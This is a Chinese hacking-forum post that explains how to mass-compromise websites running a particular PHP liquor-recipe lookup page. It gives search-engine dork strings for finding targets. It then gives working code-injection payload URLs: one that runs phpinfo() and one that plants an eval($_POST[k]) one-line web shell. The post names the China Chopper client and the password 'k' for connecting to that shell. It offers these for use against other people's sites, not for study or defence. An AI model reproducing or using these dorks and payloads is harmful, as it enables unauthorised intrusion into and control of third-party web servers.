PHP Version网站执行代码批量Getshell - 中国木马资源网

作者:admin2016-9-16 1:42分类: 黑客技术,黑客渗透网站文章 标签: PHP版本文件拿shell inurl批量拿站

Baidu & Google Keywords:

inurl:life/jiufang
intitle: 酒方大全
什么是酒方?简言之就是用酒泡制的方剂。
输入最短的关键字,如补肾输入肾后按Enter即可

等等,自己构造!


漏洞证明与使用:

phpinfo:http://www.xxxxx.com/tools/life/jiufang/index.php?q={${phpinfo%28%29}}

phpinfo.jpg

一句话地址:http://www.xxxxx.com/tools/life/jiufang/index.php?q={${eval%28$_POST[k]%29}}
菜刀连接密码:k

直接连接该URL,无需生成PHP文件,该文件自带后门!

phpinfoshell.jpg

来源:asp木马 转载注明出处!

温馨提示如有转载或引用以上内容之必要,敬请将本文链接作为出处标注,谢谢合作!

已有 0/1301 人参与

发表评论:




欢迎使用手机扫描访问本站,还可以关注微信哦~